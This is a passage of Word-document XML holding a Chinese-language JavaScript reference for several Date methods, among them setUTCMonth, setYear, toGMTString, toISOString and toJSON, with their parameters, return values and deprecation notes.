        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的分钟值。这个参数应该为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒钟值（全球时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的毫秒值（全球时间）。</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调整后的日期的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="638" w:name="Date_setUTCMonth__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.setUTCMonth()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="638"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的月份值及日期值（全球时间）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date.setUTCMonth(month)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCMonth(month,day)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的月份值。这个参数应该是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月）～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月）之间的一个整数。注意月份值是从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始的数字，一个月中的日期值则是从</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月中的日期值（全球时间）。</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调整后的日期的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="639" w:name="Date_setUTCSeconds__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.setUTCSeconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="639"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒钟及毫秒值（全球时间）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCSeconds(seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCSeconds(seconds,millis)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的秒钟值。这个参数应该为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的毫秒值（全球时间）。</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调整后的日期的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="640" w:name="Date_setYear__"/>
      <w:r>
        <w:t>Date.setYear()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="640"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的年份值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setYear(year)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个将用做该</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的年份值（全球时间）的整数。如果这个值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:t>之间，它将会加上</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>，以便把它当做</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的年份处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调整后的日期的毫秒表示形式。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个方法什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setYear()</w:t>
      </w:r>
      <w:r>
        <w:t>设置给定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值，其中</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的年份的行为有些特别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>EC</w:t>
      </w:r>
      <w:r>
        <w:t>MAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现中已不再对这个函数做要求，建议使用</w:t>
      </w:r>
      <w:r>
        <w:t>setFullYear()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="641" w:name="Date_toDateString__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.toDateString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="641"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以字符串的形式返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的日期部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.toDateString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某个</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的日期部分的一个与具体实现相关的、人类可读的字符串表示形式。以本地时区表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="642" w:name="Date_toGMTString__"/>
      <w:r>
        <w:t>Date.toGMTString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="642"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已弃用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为全球时间表示的一个字符串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date.toGMTString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>定义的日期及时间的一个字符串表示形式。在转换为字符串之前，日期将先从本地时区转换为</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>时区。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toGMTString()</w:t>
      </w:r>
      <w:r>
        <w:t>已弃用，建议使用功能相同的</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toUTCString()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的具体实现已不要对这个方法做要求，建议使用</w:t>
      </w:r>
      <w:r>
        <w:t>toUTCString()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toUTCString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="643" w:name="Date_toISOString__"/>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="643"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>ISO-8601</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串</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date.toISOString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一个字符串表示形式，以</w:t>
      </w:r>
      <w:r>
        <w:t>ISO-8601</w:t>
      </w:r>
      <w:r>
        <w:t>标准以及时区为</w:t>
      </w:r>
      <w:r>
        <w:t>"Z"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>时间表示形式，包含日期和时间的完整精度。返回的字符串格式形如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>yyyy-mm-ddThh:mm:ss.sssZ</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Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="644" w:name="Date_toJSON"/>
      <w:r>
        <w:t>Date.toJSON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="644"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>序列化一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.toJSON(key)</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key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.stri</w:t>
      </w:r>
      <w:r>
        <w:t>ngify()</w:t>
      </w:r>
      <w:r>
        <w:t>会传递这个参数，但是</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON</w:t>
      </w:r>
      <w:r>
        <w:t>方法会忽略它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一个字符串表示形式，值为调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>使用该方法将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象转换为一个字符串。它不是一个通用的方法。</w:t>
      </w:r>
    </w:p>
